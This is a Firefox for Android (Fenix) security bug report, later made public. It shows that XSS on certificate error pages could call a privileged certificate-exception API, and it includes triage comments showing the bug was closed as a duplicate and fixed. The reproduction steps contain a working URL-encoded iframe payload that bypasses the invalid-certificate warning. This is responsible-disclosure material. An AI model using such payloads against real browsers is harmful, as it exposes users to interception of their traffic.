Closed
Bug 1658144
Opened 5 years ago
Closed 4 years ago
Fenix: XSS on error pages allows access to privileged APIs
Categories
(Fenix :: General, defect)
Tracking
(Not tracked)
RESOLVED
DUPLICATE
of bug 1657055
People
(Reporter: jupenur, Assigned: sebastian)
References
Details
(4 keywords, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Minimal reproduction steps:
- Navigate to the following URL: https://wrong.host.badssl.com/%3Ciframe%20src=%22javascript:top.document.addCertException(true).then(_=%3Etop.location.href='https://wrong.host.badssl.com/');%22%3E%3C/iframe%3E
- Observe how https://wrong.host.badssl.com/ loads despite the invalid certificate
The root cause is here: https://searchfox.org/mozilla-mobile/source/android-components/components/browser/errorpages/src/main/assets/errorPageScripts.js#23-29
Firefox for Android 79.0.2
Flags: sec-bounty?
|
||
Comment 1•5 years ago
|
||
Sigh (bug 873966 comment 30).
Sebastian: Looks like a dupe of bug 1657055. Can you make sure it actually is and is fixed by your patch?
Flags: needinfo?(s.kaspari)
|
|
||
Updated•5 years ago
|
Group: firefox-core-security → mobile-core-security
Type: task → defect
Component: Security → Security: Android
Product: Firefox → Fenix
|
Assignee | |
Updated•5 years ago
|
Assignee: nobody → s.kaspari
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Flags: needinfo?(s.kaspari)
|
|
||
Updated•4 years ago
|
|
||
Comment 2•4 years ago
|
||
Looks to be fixed by 1657055. I can't reproduce in 81 or 83.
Status: ASSIGNED → RESOLVED
Closed: 4 years ago
Resolution: --- → DUPLICATE
|
||
Updated•4 years ago
|
Flags: sec-bounty? → sec-bounty-
|
||
Updated•2 years ago
|
Component: Security: Android → General
OS: Unspecified → Android
|
|
||
Updated•2 years ago
|
Group: mobile-core-security
|
||
Updated•9 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•